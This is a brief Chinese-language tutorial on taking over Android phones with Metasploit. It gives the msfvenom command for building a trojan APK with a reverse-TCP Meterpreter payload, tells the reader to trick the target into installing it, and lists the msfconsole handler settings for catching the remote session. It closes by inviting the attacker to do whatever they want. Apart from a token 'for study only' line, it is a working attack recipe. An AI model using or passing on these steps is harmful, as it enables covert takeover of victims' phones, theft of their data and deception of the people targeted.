metasploit---安卓木马入侵
(仅供学习使用,禁止非法使用)
1.生成木马程序
msfvenom -p android/meterpreter/reverse_tcp LHOST=本机ip LPORT=本机端口 R > 保存路径/文件名.apk
这里我们使用了反射型tcp,让目标主机连接我们,有时攻击服务器时这种方法可以很好的绕过防火墙。
2.想方设法欺骗对方安装木马app
3.打开msfconsole开始攻击
//选择模块 use exploit/multi/handler //显示攻击载荷 show payloads //设置攻击载荷 set payload android/meterpreter/reverse_tcp //显示需要配置的选项 show options //设置本机ip set lhost 本机ip //设置本机监听端口 set lport 本机端口
4.攻击成功,则会得到一个meterpreter会话
输入help查看帮助。
Then
you can do what you want to do.
Fun!